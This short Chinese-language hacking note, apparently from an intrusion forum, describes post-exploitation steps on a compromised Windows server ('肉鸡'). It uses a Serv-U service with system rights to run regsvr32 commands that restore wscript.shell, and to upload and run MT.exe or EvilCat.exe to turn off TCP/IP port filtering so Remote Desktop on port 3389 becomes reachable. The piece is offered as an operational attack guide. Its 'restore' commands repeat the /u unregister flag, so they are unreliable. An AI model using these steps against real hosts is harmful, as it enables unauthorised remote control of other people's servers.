wscript.shell × 命令行执行组件
这是因为wscript.shell改名了,或者从注册表删除了
删除方法:
regsvr32/u C:\windows\System32\wshom.ocx
regsvr32/u C:\windows\System32\shell32.dll
恢复方法:
regsvr32/u C:\windows\System32\wshom.ocx
regsvr32/u C:\windows\System32\shell32.dll
这里利用serv-u执行恢复命令
cmd /c regsvr32/u C:\windows\System32\wshom.ocx
cmd /c regsvr32/u C:\windows\System32\shell32.dll
恢复wscript.shell之后,本来不能读取的3389端口,变为可以读取了
为什么有时候3389开放却不能连接,有时候是因为防火墙,把终端端口转发到其他端口就可以连接,
但是更多的转发后依然是连接不上,哪是因为管理员在TCP/IP里设置的端口限制。
就算再怎么转都是连不上的。
我们需要把端口转为TCP/IP里设置的只允许连接的端口其中一个就可以了,
更好的办法是取消端口限制。
我们上传一个MT到肉鸡上,然后用具备系统权限的sev-u来执行命令。
上传cmd.exe,MT.exe到C盘,
就在Serv-u执行:c:\cmd.exe /c "mt -filter off"
而且运行成功,肉鸡也不会重启。
也可以传一个“解除TCPIP筛选的小工具EvilCat.exe”(有个小小缺点,运行后主机会重启)
直接运行就可以了
传到c:\EvilCat.exe
在Serv-u执行就OK了:c:\cmd.exe /c "EvilCat.exe"
|